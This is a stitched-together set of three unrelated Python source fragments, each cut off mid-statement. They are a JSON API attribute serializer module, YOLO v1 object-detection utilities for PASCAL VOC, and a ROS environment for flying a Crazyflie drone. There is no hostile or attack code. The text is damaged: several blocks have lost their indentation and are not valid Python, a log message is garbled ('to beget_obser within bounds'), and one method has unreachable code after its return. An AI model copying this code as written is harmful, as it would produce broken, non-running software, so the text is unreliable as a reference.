            detail = "Must be an object with " \
                     "a 'numerator' and 'denominator' member."
            raise InvalidType(detail=detail, source_pointer=sp)
        if "numerator" not in data:
            detail = "Does not have a 'numerator' member."
            raise InvalidValue(detail=detail, source_pointer=sp)
        if "denominator" not in data:
            detail = "Does not have a 'denominator' member."
            raise InvalidValue(detail=detail, source_pointer=sp)
        if not isinstance(data["numerator"], int):
            detail = "The numerator must be an integer."
            raise InvalidValue(detail=detail, source_pointer=sp / "numerator")
        if not isinstance(data["denominator"], int):
            detail = "The denominator must be an integer."
            raise InvalidValue(detail=detail,
                               source_pointer=sp / "denominator")
        if data["denominator"] == 0:
            detail = "The denominator must be not equal to zero."
            raise InvalidValue(detail=detail,
                               source_pointer=sp / "denominator")
        val = data["numerator"] / data["denominator"]
        if self.min is not None and self.min > val:
            detail = f'Must be >= {self.min}.'
            raise InvalidValue(detail=detail, source_pointer=sp)
        if self.max is not None and self.max < val:
            detail = f'Must be <= {self.max}.'
            raise InvalidValue(detail=detail, source_pointer=sp)
    def deserialize(self, schema, data, sp, **kwargs):
        # BUG FIX: the input is a mapping with 'numerator'/'denominator'
        # members (enforced by pre_validate); the original indexed
        # ``data[0]``/``data[1]``, which raises KeyError on a dict.
        return fractions.Fraction(int(data["numerator"]),
                                  int(data["denominator"]))
    def serialize(self, schema, data, **kwargs):
        return {"numerator": data.numerator, "denominator": data.denominator}
class DateTime(Attribute):
    """
    Stores a :class:`datetime.datetime` in ISO-8601 as recommended in
    http://jsonapi.org/recommendations/#date-and-time-fields.
    """

    def __init__(self, *, allow_blank: bool = False, **kwargs):
        super(DateTime, self).__init__(**kwargs)
        checker = rfc_3339.DateTime(allow_blank=allow_blank)
        if self.allow_none:
            checker |= t.Null()
        self._trafaret = checker

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            raise InvalidValue(detail=error.as_dict(), source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        return self._trafaret.check(data)

    def serialize(self, schema, data, **kwargs):
        # Already-parsed datetimes are rendered directly; anything else is
        # passed through the trafaret first.
        if isinstance(data, datetime.datetime):
            return data.isoformat()
        return self._trafaret.check(data)
class Date(Attribute):
    """
    Stores a :class:`datetime.date` in ISO-8601 as recommended in
    http://jsonapi.org/recommendations/#date-and-time-fields.
    """

    def __init__(self, *, allow_blank: bool = False, **kwargs):
        super(Date, self).__init__(**kwargs)
        checker = rfc_3339.Date(allow_blank=allow_blank)
        if self.allow_none:
            checker |= t.Null()
        self._trafaret = checker

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            raise InvalidValue(detail=error.as_dict(), source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        return self._trafaret.check(data)

    def serialize(self, schema, data, **kwargs):
        # Already-parsed dates are rendered directly; anything else is
        # passed through the trafaret first.
        if isinstance(data, datetime.date):
            return data.isoformat()
        return self._trafaret.check(data)
class TimeDelta(Attribute):
    """Stores a :class:`datetime.timedelta` as total number of seconds.
    :arg datetime.timedelta min:
        The timedelta must be greater or equal than this value.
    :arg datetime.timedelta max:
        The timedelta must be less or equal than this value.
    """
    def __init__(self, *, min=None, max=None, **kwargs):
        super(TimeDelta, self).__init__(**kwargs)
        # min must be <= max
        assert min is None or max is None or min <= max
        self.min = min
        self.max = max
    def pre_validate(self, schema, data, sp):
        try:
            data = float(data)
        except (TypeError, ValueError):
            # BUG FIX: ``float('not a number')`` raises ValueError, which the
            # original handler (TypeError only) let escape instead of
            # reporting an InvalidType error.
            detail = "Must be a number."
            raise InvalidType(detail=detail, source_pointer=sp)
        data = datetime.timedelta(seconds=data)
        if self.min is not None and self.min > data:
            detail = f'The timedelta must be >= {self.min}.'
            raise InvalidValue(detail=detail, source_pointer=sp)
        if self.max is not None and self.max < data:
            detail = f'The timedelta must be <= {self.max}.'
            raise InvalidValue(detail=detail, source_pointer=sp)
    def deserialize(self, schema, data, sp, **kwargs):
        return datetime.timedelta(seconds=float(data))
    def serialize(self, schema, data, **kwargs):
        # Serialized form is the (float) total number of seconds.
        return data.total_seconds()
class UUID(Attribute):
    """Encodes and decodes a :class:`uuid.UUID`.
    :arg int version:
        The required version of the UUID.
    """

    def __init__(self, *, version=None, **kwargs):
        super(UUID, self).__init__(**kwargs)
        self.version = version

    def pre_validate(self, schema, data, sp):
        if self.allow_none and data is None:
            return
        if not isinstance(data, str):
            raise InvalidType(detail="The UUID must be a hexadecimal string.",
                              source_pointer=sp)
        try:
            parsed = uuid.UUID(hex=data)
        except ValueError:
            detail = ("The UUID is badly formed (the representation as "
                      "hexadecimal string is needed).")
            raise InvalidValue(detail=detail, source_pointer=sp)
        if self.version is not None and self.version != parsed.version:
            raise InvalidValue(detail=f'Not a UUID{self.version}.',
                               source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        if self.allow_none and data is None:
            return None
        return uuid.UUID(hex=data)

    def serialize(self, schema, data, **kwargs):
        # Serialized form is the 32-character hex digest.
        return None if self.allow_none and data is None else data.hex
class Boolean(Attribute):
    """
    Ensures that the input is a :class:`bool`.
    """

    def __init__(self, **kwargs):
        super(Boolean, self).__init__(**kwargs)
        checker = t.Bool()
        if self.allow_none:
            checker |= t.Null()
        self._trafaret = checker

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            raise InvalidType(detail=error.as_dict(), source_pointer=sp)

    def serialize(self, schema, data, **kwargs):
        return self._trafaret.check(data)
class URI(Attribute):
"""Parses the URI with :func:`rfc3986.urlparse` and returns the result."""
def pre_validate(self, schema, data, sp):
if not isinstance(data, str):
detail = "Must be a string."
raise InvalidType(detail=detail, source_pointer=sp)
try:
URL(data)
except ValueError:
detail = "Not a valid URI."
raise InvalidValue(detail=detail, source_pointer=sp)
def | |
import os
import io
import cv2
import sys
import time
import pickle
import getopt
import torch
import random
import numpy as np
import torch.utils.data as data
import xml.etree.ElementTree as ET
import torchvision.transforms as transforms
from cv2 import cv2
from visdom import Visdom
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
# The 20 PASCAL VOC object categories; a label index i maps to
# VOC_CLASSES[i], and VOC_CLASSES.index(name) recovers the label.
VOC_CLASSES = (
    'aeroplane', 'bicycle', 'bird', 'boat',
    'bottle', 'bus', 'car', 'cat', 'chair',
    'cow', 'diningtable', 'dog', 'horse',
    'motorbike', 'person', 'pottedplant',
    'sheep', 'sofa', 'train', 'tvmonitor')
# 21 color triples used when drawing detection boxes; indexed by the raw
# class label (0-19) in imageShow.boxImageShow, so only the first 20 entries
# are actually selectable there.
Color = [[0, 0, 0],
         [128, 0, 0],
         [0, 128, 0],
         [128, 128, 0],
         [0, 0, 128],
         [128, 0, 128],
         [0, 128, 128],
         [128, 128, 128],
         [64, 0, 0],
         [192, 0, 0],
         [64, 128, 0],
         [192, 128, 0],
         [64, 0, 128],
         [192, 0, 128],
         [64, 128, 128],
         [192, 128, 128],
         [0, 64, 0],
         [128, 64, 0],
         [0, 192, 0],
         [128, 192, 0],
         [0, 64, 128]]
# write image or paint image
class imageShow():
    """Rendering helpers: draw detection boxes on an image or plot a curve,
    writing the result to disk and/or a visdom window."""
    def __init__(self):
        pass
    # show image with boxes
    @staticmethod
    def boxImageShow(cv2_image, probs, labels, boxes, write_file='', use_visdom=True, resize=False):
        """Draw one rectangle plus '<prob>, <class>' caption per detection.
        Args:
            cv2_image: HxWxC image array.
            probs: per-box confidence scores.
            labels: per-box class indices into VOC_CLASSES.
            boxes: per-box [x1, y1, x2, y2]; normalized to [0, 1] when
                ``resize`` is True, otherwise pixel coordinates.
            write_file: if non-empty, path to write the annotated image to.
            use_visdom: also push the image to the 'main' visdom environment.
            resize: scale normalized boxes up to pixel coordinates.
        """
        h, w, _ = cv2_image.shape
        boxes = torch.Tensor(boxes)
        if resize:
            boxes = boxes * torch.Tensor([w, h, w, h]).expand_as(boxes)
        for i in range(len(probs)):
            pt1 = (int(boxes[i][0]), int(boxes[i][1]))
            pt2 = (int(boxes[i][2]), int(boxes[i][3]))
            # BUG FIX: the original condition was ``probs == 0``, comparing
            # the whole list with 0 (never True for a list), so
            # zero-confidence boxes were still drawn.  Test this box's own
            # score instead.
            if probs[i] == 0 or pt1 == pt2:
                continue
            color = Color[int(labels[i])]
            title = str(round(probs[i], 3)) + ', ' + VOC_CLASSES[int(labels[i])]
            cv2.rectangle(img=cv2_image, pt1=pt1, pt2=pt2, color=color, thickness=2)
            cv2.putText(img=cv2_image, text=title, org=(pt1[0], pt1[1] + 20), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5, color=(0,0,255), thickness=2)
        if write_file != '':
            cv2.imwrite(write_file, cv2_image)
        if use_visdom:
            img = cv2.cvtColor(cv2_image, cv2.COLOR_BGR2RGB)
            img = transforms.ToTensor()(img)
            Visdom(env='main').image(img, win='showBox')
    @staticmethod
    def curveShow(x_list, y_list, xlabel='', ylabel='', title='', use_visdom=True, write_file=''):
        """Plot y_list against x_list with matplotlib and export the figure
        as an image (to ``write_file`` and/or a visdom window)."""
        plt.plot(x_list, y_list)
        plt.xlabel(xlabel, size=13)
        plt.ylabel(ylabel, size=13)
        plt.title(title, size=13)
        # turn plt into cv2
        buf = io.BytesIO()
        plt.savefig(buf, format='jpg')
        plt.close()
        buf.seek(0) # to the first address
        img = cv2.imdecode(np.frombuffer(buf.getvalue(), np.uint8), cv2.IMREAD_COLOR)
        buf.close()
        if write_file != '':
            cv2.imwrite(write_file, img)
        if use_visdom:
            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
            img = transforms.ToTensor()(img)
            Visdom(env='main').image(img, win='showBox')
# function class generating and parsing target
class targetGenerator():
def __init__(self):
pass
# return name x1 y1 x2 y2 class x1 y1 x2 y2 class ...
@staticmethod
def parseVOCXml(filename, spec_difficult=0):
'''
voc xml sample: VOC2007/Annotations/009931.xml:
<annotation>
<folder>VOC2007</folder>
<filename>009931.jpg</filename>
<source>
<database>The VOC2007 Database</database>
<annotation>PASCAL VOC2007</annotation>
<image>flickr</image>
<flickrid>336444880</flickrid>
</source>
<owner>
<flickrid><NAME></flickrid>
<name><NAME></name>
</owner>
<size>
<width>500</width>
<height>332</height>
<depth>3</depth>
</size>
<segmented>0</segmented>
<object>
<name>person</name>
<pose>Frontal</pose>
<truncated>0</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>135</xmin>
<ymin>159</ymin>
<xmax>170</xmax>
<ymax>250</ymax>
</bndbox>
<part>
<name>head</name>
<bndbox>
<xmin>147.7376</xmin>
<ymin>158.2127</ymin>
<xmax>159.3398</xmax>
<ymax>173.6823</ymax>
</bndbox>
</part>
<part>
...
</part>
</object>
<object>
<name>horse</name>
<pose>Unspecified</pose>
<truncated>0</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>90</xmin>
<ymin>160</ymin>
<xmax>143</xmax>
<ymax>250</ymax>
</bndbox>
</object>
<object>
...
</object>
</annotation>
'''
root = ET.parse(filename).getroot()
# size = root.find('size')
name = root.find('filename').text
# width = int(float(size.find('width').text))
# height = int(float(size.find('height').text))
# depth = int(float(size.find('depth').text))
# segmented = int(float(root.find('segmented').text))
# if spec_segmented != -1 and segmented != spec_segmented:
# return ''
objects = []
for obj in root.findall('object'):
tmp = {}
bndbox = obj.find('bndbox')
tmp['name'] = obj.find('name').text
tmp['pose'] = obj.find('pose').text
tmp['truncated'] = int(float(obj.find('truncated').text))
tmp['difficult'] = int(float(obj.find('difficult').text))
tmp['xmin'] = int(float(bndbox.find('xmin').text))
tmp['ymin'] = int(float(bndbox.find('ymin').text))
tmp['xmax'] = int(float(bndbox.find('xmax').text))
tmp['ymax'] = int(float(bndbox.find('ymax').text))
if spec_difficult != -1 and tmp['difficult'] != spec_difficult:
continue
objects.append(tmp)
# print(filename, width, height, depth, segmented, objects)
info = ''
for obj in objects:
info = info + ' ' + str(obj['xmin']) + ' ' + str(obj['ymin'])
info = info + ' ' + str(obj['xmax']) + ' ' + str(obj['ymax'])
info = info + ' ' + str(VOC_CLASSES.index(obj['name']))
if str(name).strip() == '':
return ''
return name + info + '\n'
# from annotation folder generate a text
@classmethod
def VOCXml2Txt(cls, annotations, out_file):
out_file = open(out_file, 'w')
xml_files = os.listdir(annotations)
xml_files.sort()
for xml_file in xml_files:
out_file.write(cls.parseVOCXml(annotations + xml_file))
out_file.close()
# return list imagefile names, labels (0-19), boxes
@staticmethod
def loadBoxLabel(list_file):
imagefiles, labels, boxes = [], [], []
# fix arg listfile ------------------
list_file = [list_file] if isinstance(list_file, str) else list_file
# read boxes and labels in lines -------------
lines = []
for filename in list_file:
with open(filename) as f:
lines.extend(f.readlines())
for line in lines:
splited = line.strip().split()
imagefiles.append(splited[0])
# one image could has many boxes
box = []
label = []
num_box = (len(splited) - 1) // 5
for i in range(num_box):
x1 = float(splited[1+5*i])
y1 = float(splited[2+5*i])
x2 = float(splited[3+5*i])
y2 = float(splited[4+5*i])
box.append([x1, y1, x2, y2])
label.append(int(splited[5+5*i]))
boxes.append(box)
labels.append(label)
return imagefiles, labels, boxes
# return target of 14x14x30, 30 means label can be 0-19
@staticmethod
def genTarget(height, width, boxes, labels):
# TARGET: 14x14x30 (in YOLO v1, 7x7x30)
# target[i,j,0:4]: bounding box 1 position (dx dy w h)
# target[i,j,4]: confidence for box 1
# target[i,j,5:9]: bounding box 2 position (dx dy w h)
# target[i,j,9]: confidence for box 2
# target[i,j,10:30]: probability for the object with this label if truly have object
# dx = center_x / cell_size - i; dy = center_y / cell_size - j
# confidence for box k = P{have object} * IOU{prediction box compare to ground truth}
# IOU{prediction box compare to ground truth} = 1, when in eval mode
box_num = 2
grid_num = 14
target_num = 30
target = torch.zeros((grid_num, grid_num, target_num))
cell_size = 1.0 / grid_num
boxes = boxes / torch.Tensor([width, height, width, height]).expand_as(boxes)
box_size = boxes[:,2:] - boxes[:,:2]
center = (boxes[:,2:] + boxes[:,:2]) / 2.0
# if in one grid, then cover the target
for i in range(center.size()[0]):
grid = (center[i] / cell_size).ceil() - 1 # center in which grid
delta = center[i] / cell_size - grid # delta between center and grid_left_top
coordx, coordy = int(grid[0]), int(grid[1]) # since cv2_image is h,w,c, so coordy first
target[coordy, coordx, int(labels[i]) + box_num * 5] = 1
for b in range(box_num):
tmp_ind = b * 5
target[coordy, coordx, tmp_ind:tmp_ind+2] = delta
target[coordy, coordx, tmp_ind+2:tmp_ind+4] = box_size[i]
target[coordy, coordx, tmp_ind+4] = 1
return target
# non maximum suppression, return list keep whith input np.array boxes and probs
@staticmethod
def nms(boxes, probs, threshold=0.5):
# input probs: np.array([...]), boxes: np.array([[x1,y1,x2,y2],...])
keep = []
order = np.argsort(probs)[::-1]
left_tops = boxes[:,0:2]
right_bottoms = boxes[:,2:4]
width_heights = right_bottoms - left_tops
areas = width_heights[:,0] * width_heights[:,1]
while len(order) > 0:
# store max confidence
i = order[0]
keep.append(i)
order = order[1:]
if len(order) == 0: break
# calc iou = intersection / union
max_left_tops = np.maximum(left_tops[i,:], left_tops[order,:])
min_right_bottoms = np.minimum(right_bottoms[i,:], right_bottoms[order,:])
min_width_heights = np.maximum(0.0, (min_right_bottoms - max_left_tops))
intersections = min_width_heights[:, 0] * min_width_heights[:, 1]
ious = intersections / (areas[i] + areas[order] - intersections)
order = order[np.where(ious <= threshold)[0]]
return keep
# return list probs, labels(0-19), boxes with input tensor target 14x14x30, use nms
    @classmethod
    def parseTarget(cls, target, height, width, threshold=0.1):
        """Decode a 14x14x30 YOLO target tensor into detections.

        Each grid cell holds 2 boxes of 5 values (dx, dy, w, h, conf)
        followed by 20 class probabilities. Boxes are converted back to
        absolute pixel corners and filtered with NMS.

        Args:
            target: torch tensor of shape (grid_num, grid_num, 30).
            height: original image height in pixels.
            width: original image width in pixels.
            threshold: minimum confidence/probability to keep a box.

        Returns:
            (probs, labels, boxes) lists; ([], [], [[]]) when nothing is found.
        """
        probs, labels, boxes = [], [], []
        box_num = 2
        grid_num = 14
        all_box_num = 5 * box_num
        cell_size = 1.0 / grid_num
        # Indices of the confidence entry of each box (4, 9, ...).
        conf_ind = list(range(4, all_box_num, 5))
        for i in range(grid_num):
            for j in range(grid_num):
                tmp_info = []
                box_target = target[i, j, :all_box_num].numpy()
                box_confs = box_target[conf_ind]
                # Best class probability and its label for this cell.
                prob_label, label = target[i, j, all_box_num:].max(0)
                prob_label, label = prob_label.item(), label.item()
                # check if some boxes has high probabilities
                for b in range(box_num):
                    ind = 5 * b
                    if box_target[ind+4] > threshold:
                        tmp_info.append(tuple(box_target[ind:ind+5]))
                # NOTE(review): the comment says "nothing found so far" but the
                # condition checks == 1, not == 0 — when exactly one box passed
                # the threshold, the max-confidence box is appended as well
                # (deduplicated by the set() below). Confirm this is intended.
                # nothing found so far
                if len(tmp_info) == 1:
                    ind = box_confs.argmax() * 5
                    tmp_info.append(tuple(box_target[ind:ind+5]))
                # turn tmp_info into [prob, label, box]
                tmp_info = list(set(tmp_info)) # delete repeated value
                for tmp in tmp_info:
                    tmp = list(tmp)
                    # (dx, dy) are offsets within the cell; recover the
                    # normalized box center, then scale to pixels.
                    center_x, center_y = cell_size * (tmp[0] + j), cell_size * (tmp[1] + i)
                    x1 = (center_x - tmp[2] / 2.0) * width
                    x2 = (center_x + tmp[2] / 2.0) * width
                    y1 = (center_y - tmp[3] / 2.0) * height
                    y2 = (center_y + tmp[3] / 2.0) * height
                    # Final score = class probability * box confidence.
                    prob = prob_label * tmp[4]
                    if prob > threshold:
                        boxes.append([x1, y1, x2, y2])
                        labels.append(int(label))
                        probs.append(prob)
        # non maximum suppression
        if len(probs) == 0:
            return [], [], [[]]
        probs, labels, boxes = np.array(probs), np.array(labels), np.array(boxes)
        keep = cls.nms(boxes, probs)
        return probs[keep].tolist(), labels[keep].tolist(), boxes[keep].tolist()
# function class transforing images
class imageTransform():
voc_mean = (123,117,104) # VOC images mean RGB
image_size = 448 # YOLO input size
def __init__(self):
pass
@classmethod
def loadImageTensor(cls, filename):
img | |
import os
from collections import OrderedDict
import numpy as np
from PIL import Image
from io import BytesIO
from gcg.envs.env import Env
from gcg.envs.env_spec import EnvSpec
from gcg.envs.spaces.box import Box
from gcg.envs.spaces.discrete import Discrete
from gcg.data.logger import logger
import matplotlib.pyplot as plt
import threading
import time
import rospy
import rosbag
import std_msgs.msg
import geometry_msgs.msg
import sensor_msgs.msg
import crazyflie.msg
class RolloutRosbag:
    """Records one rollout per rosbag file.

    Bags are written to ``<logger.dir>/rosbags/rosbagNNNN.bag`` with an
    auto-incremented, zero-padded index.
    """

    def __init__(self):
        self._rosbag = None       # open rosbag.Bag, or None when no bag is open
        self._last_write = None   # rospy.Time recorded when the bag was opened

    @property
    def _rosbag_dir(self):
        """Directory that holds all rollout bags (created on first use)."""
        # Renamed local (was `dir`, shadowing the builtin); makedirs with
        # exist_ok avoids the exists()/mkdir() race of the original.
        path = os.path.join(logger.dir, 'rosbags')
        os.makedirs(path, exist_ok=True)
        return path

    def _rosbag_name(self, num):
        """Full path of the bag file with index ``num``."""
        return os.path.join(self._rosbag_dir, 'rosbag{0:04d}.bag'.format(num))

    @property
    def is_open(self):
        return (self._rosbag is not None)

    def open(self):
        """Start a new bag using the first unused index."""
        assert (not self.is_open)
        bag_num = 0
        while os.path.exists(self._rosbag_name(bag_num)):
            bag_num += 1
        self._rosbag = rosbag.Bag(self._rosbag_name(bag_num), 'w', compression='bz2')
        self._last_write = rospy.Time.now()

    def write(self, topic, msg, stamp):
        """Record ``msg`` on ``topic`` if it was stamped after the bag opened."""
        assert (self._rosbag is not None)
        if msg is not None and stamp is not None:
            # Only messages received after open() count as part of this rollout.
            if stamp > self._last_write:
                self._rosbag.write(topic, msg)
        else:
            logger.warn('Topic {0} not received'.format(topic))

    def write_all(self, topics, msg_dict, stamp_dict):
        """Record the latest message of every topic in ``topics``."""
        for topic in topics:
            self.write(topic, msg_dict.get(topic), stamp_dict.get(topic))

    def close(self):
        """Finalize and release the current bag."""
        assert (self.is_open)
        self._rosbag.close()
        self._rosbag = None
        self._last_write = None

    def trash(self):
        """Close (best effort) and delete the current bag file."""
        assert (self.is_open)
        bag_fname = self._rosbag.filename
        try:
            self.close()
        except Exception:
            # Was a bare `except:`; best-effort close is kept, but we no
            # longer swallow KeyboardInterrupt/SystemExit.
            pass
        # bag_fname is already an absolute path, so join() returns it as-is.
        os.remove(os.path.join(self._rosbag_dir, bag_fname))
class CrazyflieEnv(Env):
def __init__(self, params={}):
params.setdefault('dt', 0.25)
params.setdefault('horizon', int(5. * 60. / params['dt'])) # 5 minutes worth
params.setdefault('ros_namespace', '/crazyflie/')
params.setdefault('obs_shape', (72, 96, 1))
params.setdefault('yaw_limits', [-120, 120]) #default yaw rate range
params.setdefault('fixed_alt', 0.4)
params.setdefault('fixed_velocity_range', [0.4, 0.4])
params.setdefault('press_enter_on_reset', False)
params.setdefault('prompt_save_rollout_on_coll', False)
params.setdefault('enable_adjustment_on_start', True)
params.setdefault('use_joy_commands', True)
params.setdefault('joy_start_btn', 1) #A
params.setdefault('joy_stop_btn', 2) #B
params.setdefault('joy_coll_stop_btn', 0) #X
params.setdefault('joy_trash_rollout_btn', 3) # Y
params.setdefault('joy_topic', '/joy')
params.setdefault('collision_reward', 1)
params.setdefault('collision_reward_only', True)
self._obs_shape = params['obs_shape']
self._yaw_limits = params['yaw_limits']
self._fixed_alt = params['fixed_alt']
self._collision_reward = params['collision_reward']
self._collision_reward_only = params['collision_reward_only']
self._fixed_velocity_range = params['fixed_velocity_range']
self._fixed_velocity = np.random.uniform(self._fixed_velocity_range[0], self._fixed_velocity_range[1])
self._dt = params['dt']
self.horizon = params['horizon']
# start stop and pause
self._enable_adjustment_on_start = params['enable_adjustment_on_start']
self._use_joy_commands = params['use_joy_commands']
self._joy_topic = params['joy_topic']
self._joy_stop_btn = params['joy_stop_btn']
self._joy_coll_stop_btn = params['joy_coll_stop_btn']
self._joy_start_btn = params['joy_start_btn']
self._joy_trash_rollout_btn = params['joy_trash_rollout_btn']
self._press_enter_on_reset = params['press_enter_on_reset']
self._prompt_save_rollout_on_coll = params['prompt_save_rollout_on_coll']
self._start_pressed = False
self._stop_pressed = False
self._trash_rollout = False
self._coll_stop_pressed = False
self._curr_joy = None
self._curr_motion = crazyflie.msg.CFMotion()
self._setup_spec()
assert (self.observation_im_space.shape[-1] == 1 or self.observation_im_space.shape[-1] == 3)
self.spec = EnvSpec(
observation_im_space=self.observation_im_space,
action_space=self.action_space,
action_selection_space=self.action_selection_space,
observation_vec_spec=self.observation_vec_spec,
action_spec=self.action_spec,
action_selection_spec=self.action_selection_spec,
goal_spec=self.goal_spec)
self._last_step_time = None
self._is_collision = False
rospy.init_node('CrazyflieEnv', anonymous=True)
time.sleep(0.5)
self._ros_namespace = params['ros_namespace']
self._ros_topics_and_types = dict([
('cf/0/image', sensor_msgs.msg.CompressedImage),
('cf/0/data', crazyflie.msg.CFData),
('cf/0/coll', std_msgs.msg.Bool),
('cf/0/motion', crazyflie.msg.CFMotion)
])
self._ros_msgs = dict()
self._ros_msg_times = dict()
for topic, type in self._ros_topics_and_types.items():
rospy.Subscriber(topic, type, self.ros_msg_update, (topic,))
self._ros_motion_pub = rospy.Publisher("/cf/0/motion", crazyflie.msg.CFMotion, queue_size=10)
self._ros_command_pub = rospy.Publisher("/cf/0/command", crazyflie.msg.CFCommand, queue_size=10)
self._ros_stop_pub = rospy.Publisher('/joystop', crazyflie.msg.JoyStop, queue_size=10)
if self._use_joy_commands:
logger.debug("Environment using joystick commands")
self._ros_joy_sub = rospy.Subscriber(self._joy_topic, sensor_msgs.msg.Joy, self._joy_cb)
# I don't think this is needed
# self._ros_pid_enable_pub = rospy.Publisher(self._ros_namespace + 'pid/enable', std_msgs.msg.Empty,
# queue_size=10)
# self._ros_pid_disable_pub = rospy.Publisher(self._ros_namespace + 'pid/disable', std_msgs.msg.Empty,
# queue_size=10)
self._ros_rolloutbag = RolloutRosbag()
self._t = 0
self.suppress_output = False
self.resetting = False
self._send_override = False # set true only when resetting but still wanting to send background thread motion commands
threading.Thread(target = self._background_thread).start()
time.sleep(1.0) #waiting for some messages before resetting
self.delete_this_variable = 0
    def _setup_spec(self):
        """Build the action/observation/goal spaces and specs.

        The only action is a yaw rate (degrees); observations are the camera
        image plus a single collision flag.
        """
        self.action_spec = OrderedDict()
        self.action_selection_spec = OrderedDict()
        self.observation_vec_spec = OrderedDict()
        self.goal_spec = OrderedDict()
        # Full physical yaw range the env will accept.
        self.action_spec['yaw'] = Box(low=-180, high=180)
        self.action_space = Box(low=np.array([self.action_spec['yaw'].low[0]]), high = np.array([self.action_spec['yaw'].high[0]]))
        # Narrower range the policy is allowed to select from (configurable).
        self.action_selection_spec['yaw'] = Box(low=self._yaw_limits[0], high=self._yaw_limits[1])
        self.action_selection_space = Box(low=np.array([self.action_selection_spec['yaw'].low[0]]), high = np.array([self.action_selection_spec['yaw'].high[0]]))
        # Selection range must be contained in the full action range.
        assert (np.logical_and(self.action_selection_space.low >= self.action_space.low,
                               self.action_selection_space.high <= self.action_space.high).all())
        self.observation_im_space = Box(low=0, high=255, shape=self._obs_shape)
        self.observation_vec_spec['coll'] = Discrete(1)
def _log(self, msg, lvl):
if not self.suppress_output:
if lvl == "info":
logger.info(msg)
elif lvl == "debug":
logger.debug(msg)
elif lvl == "warn":
logger.warn(msg)
elif lvl == "error":
logger.error(msg)
else:
print("NOT VALID LOG LEVEL")
    def _get_observation(self):
        """Decode the latest camera frame and the collision flag.

        Returns:
            (im, vec): image array shaped per ``observation_im_space``
            (grayscale gets a trailing singleton channel), and a length-1
            vector holding the collision flag.
        """
        msg = self._ros_msgs['cf/0/image']
        # Message carries JPEG-compressed bytes; decode via PIL.
        recon_pil_jpg = BytesIO(msg.data)
        recon_pil_arr = Image.open(recon_pil_jpg)
        is_grayscale = (self.observation_im_space.shape[-1] == 1)
        if is_grayscale:
            grayscale = recon_pil_arr.convert('L')
            # NOTE(review): Image.ANTIALIAS is deprecated/removed in newer
            # Pillow (use Image.LANCZOS) — confirm the pinned Pillow version.
            grayscale_resized = grayscale.resize(self.observation_im_space.shape[:-1][::-1],
                                                 Image.ANTIALIAS)  # b/c (width, height)
            im = np.expand_dims(np.array(grayscale_resized), 2)
        else:
            rgb_resized = recon_pil_arr.resize(self.observation_im_space.shape[:-1][::-1],
                                               Image.ANTIALIAS)  # b/c (width, height)
            im = np.array(rgb_resized)
        # Collision is either sensed or manually flagged via joystick.
        coll = self._get_collision() or self._get_joy_coll_stop()
        vec = np.array([coll])
        if(vec[0]==1):
            self._log("COLLISION!!", "info")
        return im, vec
def _get_goal(self):
return np.array([])
def _get_reward(self):
if self._is_collision:
reward = self._collision_reward
else:
reward = 0
return reward
### JOYSTICK ###
    def _get_joy_stop(self):
        """True when joystick control is enabled and the stop button was latched."""
        #in this order
        return self._use_joy_commands and self._stop_pressed
    def _get_joy_coll_stop(self):
        """True when the manual collision-stop button was latched (joystick enabled)."""
        return self._use_joy_commands and self._coll_stop_pressed
    def _get_trash_rollout(self):
        """True when the trash-rollout button was latched (joystick enabled)."""
        return self._use_joy_commands and self._trash_rollout
def _get_joy_start(self):
#in this order
return self._use_joy_commands and self._start_pressed
self._curr_joy and self._curr_joy.buttons[self._joy_start_btn]
### OTHER ###
    def _get_collision(self):
        """True when a (sensed) collision has been recorded this rollout."""
        return self._is_collision
    def _get_done(self):
        """Episode ends on manual stop, collision, trash-rollout, or collision-stop."""
        return self._get_joy_stop() or self._get_collision() or self._get_trash_rollout() or self._get_joy_coll_stop()
    def _background_thread(self):
        """Continuously republish the current motion command at 10 Hz.

        Publishes only while joystick commands are active and not resetting,
        unless ``_send_override`` forces publishing during a reset.
        """
        rate = rospy.Rate(10)
        while not rospy.is_shutdown():
            if (self._use_joy_commands and not self.resetting) or self._send_override:
                self._ros_motion_pub.publish(self._curr_motion)
            rate.sleep()
def _set_motion(self, x, y, yaw, dz):
motion = crazyflie.msg.CFMotion()
motion.x = x
motion.y = y
motion.yaw = yaw
motion.dz = dz
motion.is_flow_motion = True
self._curr_motion = motion
    def _set_command(self, cmd):
        """Publish a one-shot flight command.

        :param cmd: 0 is ESTOP, 1 is LAND, 2 is TAKEOFF.
        """
        #0 is ESTOP, 1 IS LAND, 2 IS TAKEOFF
        command = crazyflie.msg.CFCommand()
        command.cmd = cmd
        self._ros_command_pub.publish(command)
    def _set_stop(self, msg):
        """Publish a JoyStop flag.

        :param msg: 0 for a plain stop, 1 for a collision stop.
        """
        #0 is no coll stop, 1 is coll stop
        stop = crazyflie.msg.JoyStop()
        stop.stop = msg
        self._ros_stop_pub.publish(stop)
    def _joy_cb(self, msg):
        """Joystick subscriber callback: latch button presses as state flags.

        Flags stay set until reset_state() clears them, so a brief press is
        not missed between env steps. Stop/coll-stop presses also broadcast
        a JoyStop message immediately.
        """
        self._curr_joy = msg
        #permanent state
        if self._curr_joy.buttons[self._joy_start_btn]:
            self._start_pressed = True
        if self._curr_joy.buttons[self._joy_stop_btn]:
            self._stop_pressed = True
            self._set_stop(0)
        if self._curr_joy.buttons[self._joy_coll_stop_btn]:
            self._coll_stop_pressed = True
            self._set_stop(1)
        if self._curr_joy.buttons[self._joy_trash_rollout_btn]:
            self._trash_rollout = True
def step(self, action, offline=False):
if not offline:
assert (self.ros_is_good())
if not self._ros_rolloutbag.is_open and self._get_joy_start():
self._log("Beginning Episode...", "info")
self._ros_rolloutbag.open()
elif not self._ros_rolloutbag.is_open:
self._log("Waiting for Joystick input ...", "debug")
action = np.asarray(action)
if not (np.logical_and(action >= self.action_space.low, action <= self.action_space.high).all()):
self._log('Action {0} will be clipped to beget_obser within bounds: {1}, {2}'.format(action,
self.action_space.low,
